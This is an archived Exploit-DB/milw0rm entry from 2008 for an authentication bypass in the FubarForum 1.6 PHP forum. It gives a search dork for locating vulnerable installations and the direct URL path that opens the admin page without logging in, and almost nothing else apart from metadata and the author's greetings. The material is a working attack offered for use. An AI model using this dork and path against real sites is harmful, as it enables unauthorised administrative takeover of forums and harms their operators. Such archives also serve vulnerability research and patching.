FubarForum 1.6 - Arbitrary Admin Bypass Vulnerability

2008-12-28T00:00:00
ID EDB-ID:7595
Type exploitdb
Reporter k3yv4n
Modified 2008-12-28T00:00:00

Description

FubarForum 1.6 Arbitrary Admin Bypass Vulnerability. Webapps exploit for php platform

                                        
                                                                                                                                         
                                                                                                                    in the name of god

                                                                                                          ..:: jj_nanak2000@yahoo.com ::.. 


                                                                                                                      Tanx from : Expl0its 



Script : FubarForum

Version : 1.6

Dork : "Powered by FubarForum v1.6"

/forum/index.php?page=admin

# milw0rm.com [2008-12-28]